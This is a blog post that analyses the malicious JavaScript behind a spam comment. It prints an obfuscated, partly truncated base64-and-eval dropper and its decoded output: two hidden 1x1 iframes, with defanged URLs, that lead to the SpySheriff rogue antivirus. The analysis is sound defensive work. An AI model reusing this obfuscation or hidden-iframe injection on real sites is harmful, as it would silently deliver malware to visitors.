Disection of a Spam Comment

I get lots of spam comments on my blog each day.  Most are a similar looking spam with a bunch of links.  I moderate all comments to aviod spam, so none of this ever makes it to the site.  But today I got curious – what is this spam for?  Who sends it?

Manually following the URLs in my browser yields some javascript alerts where they are trying to get me to click “OK”.  Let’s see what happens if you do that.  It’s very interesting!

First off, you get the following script.  This is complicated javascript masking technique.  Let’s look at the code.

   1: <script>   2: function bNVEXM(inp)
   3:  {
   4:    var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh...
   5:    var out="";
   6:    var c1,c2,c3="";
   7:    var e1,e2,e3,e4="";
   8:    var i=0; 
   9:    do { 
  10:      e1=k.indexOf(inp.charAt(i++));
  11:      e2=k.indexOf(inp.charAt(i++));
  12:      e3=k.indexOf(inp.charAt(i++));
  13:      e4=k.indexOf(inp.charAt(i++)); 
  14:      c1=(e1<<2)|(e2>>4);
  15:      c2=((e2&15)<<4)|(e3>>2);
  16:      c3=((e3&3)<<6)|e4;
  17:      out+=String.fromCharCode(c1); 
  18:      if(e3!=64){
  19:        out+=String.fromCharCode(c2)
  20:      };
  21:      if(e4!=64){
  22:        out+=String.fromCharCode(c3);
  23:      } 
  24:    } while(i<inp.length);
  25:    return out; 
  26:  }
  28:  function fDVGFV(a1,b1){
  29:    if(!b1){
  30:      return eval(bNVEXM("ZG9jdW1lbnQud3JpdGUo...
  31:    } 
  32:    var i; 
  33:    var o="";
  34:    var k=314; 
  35:    a1=bNVEXM(a1);
  36:    for(i=0;i<a1.length;i++) {
  37:      o+=String.fromCharCode(
  38:    }
  39:    return o;
  40:  }
  42:  fDVGFV('YVxJUVNEUW5BNpiaaV59NWE2Zj4hNCYyNmQqPy8+bmpj...
  43:  </script>

Pretty complicated, huh? Well, it’s not too hard to decipher.  The main of it is line 42, calling a function fDVGFV().  The argument is an encrypted string of javascript code.  At line 30 (when there is only one argument passed in), it will convert the first argument into javascript code, and call eval to run that javascript code.  That intermediate javascript happens to decode into the following single line:

   1:  document.write(fDVGFV(a1,arguments.callee.toString().replace(/\s/g,"")));

So basically, it just does a minor transform on the input code, and then passes it to be decoded again.  Finally, the loop in lines 36-38 actually convert it to text which can be rendered, and the final HTML output becomes (I added xxx to mangle the URLs):

<IFRAME SRC="http://xxxjoutweb.netxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="http://xxxfrlynx.infoxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>

These iframes are what actually loads the final webpages into your browser.  After following through a few additional iframes, both of these will ultimately land you at a javascript dialog pushing SpySheriff (see WikiPedia’s description), a well known malware program.  The product is signed with a valid certificate to HiPoint, Ltd, based out of Panama, issued by Thawte.  If you thought that digital signatures have any meaning with software, you are wrong.  Anyone can sign software, even if it is malware…

I can’t seem to find anyone’s explanation of why SpySheriff exists.  But they employ a lot of code to try to get their junk distributed, and they are very persistent.  All this sophistication in their javascript is to camoflauge the javascript so that spam-detection techniques don’t work.  It’s unfortunate that the javascript “eval” function exists at all – I happen to agree with Eric Lippert on this issue.  Eval is not really necessary, and it creates massive security issues for everyone in addition to helping jerks like SpySherrif circumvent spam detectors.  (See again WikiPedia on the subject)

It’s probably worth noting that this security problem, while commonly blamed on Microsoft’s IE, actually originates in Javascript itself, which was invented by Netscape way back in 1995 or so.  IE just copied it with bug-for-bug compatibility!  (Granted, that was over 10 years ago…)

Leave a Reply

You must be logged in to post a comment.